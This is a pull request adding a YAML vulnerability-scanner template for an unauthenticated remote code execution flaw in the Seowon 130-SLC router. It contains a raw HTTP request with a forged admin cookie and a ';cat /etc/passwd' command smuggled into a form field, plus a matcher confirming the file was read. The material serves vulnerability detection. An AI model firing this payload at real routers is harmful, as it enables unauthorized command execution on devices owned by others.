### PR TITLE
Create seowon-router-rce.yaml

### DIFF
--- a/vulnerabilities/other/seowon-router-rce.yaml
+++ b/vulnerabilities/other/seowon-router-rce.yaml
@@ -1,0 +1,35 @@
+id: seowon-router-rce
+
+info:
+  name: Seowon 130-SLC router -  Remote Code Execution (Unauthenticated) 
+  author: gy741
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/50295
+  tags: rce,seowon
+  description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Referer: http://{{Hostname}}/diagnostic.html?t=201701020919
+        Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
+        Connection: keep-alive
+        
+        Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+        part: body
+
+      - type: status
+        status:
+          - 200

--- a/vulnerabilities/other/seowon-router-rce.yaml
+++ b/vulnerabilities/other/seowon-router-rce.yaml
@@ -17,7 +17,7 @@ requests:
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded
-        Referer: http://{{Hostname}}/diagnostic.html?t=201701020919
+        Referer: {{BaseURL}}/diagnostic.html?t=201701020919
         Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
         Connection: keep-alive
 

--- a/vulnerabilities/other/seowon-router-rce.yaml
+++ b/vulnerabilities/other/seowon-router-rce.yaml
@@ -1,12 +1,12 @@
 id: seowon-router-rce
 
 info:
-  name: Seowon 130-SLC router -  Remote Code Execution (Unauthenticated) 
+  name: Seowon 130-SLC router -  Remote Code Execution (Unauthenticated)
   author: gy741
   severity: critical
-  reference: https://www.exploit-db.com/exploits/50295
-  tags: rce,seowon
   description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
+  reference: https://www.exploit-db.com/exploits/50295
+  tags: rce,seowon,router,unauth
 
 requests:
   - raw:
@@ -20,7 +20,7 @@ requests:
         Referer: http://{{Hostname}}/diagnostic.html?t=201701020919
         Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
         Connection: keep-alive
-        
+
         Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
 
     matchers-condition: and


### PR DESCRIPTION

### Template / PR Information

Hello,

Added seowon-router-rce rule.

```
Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
```

Thanks.

- References: https://www.exploit-db.com/exploits/50295

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO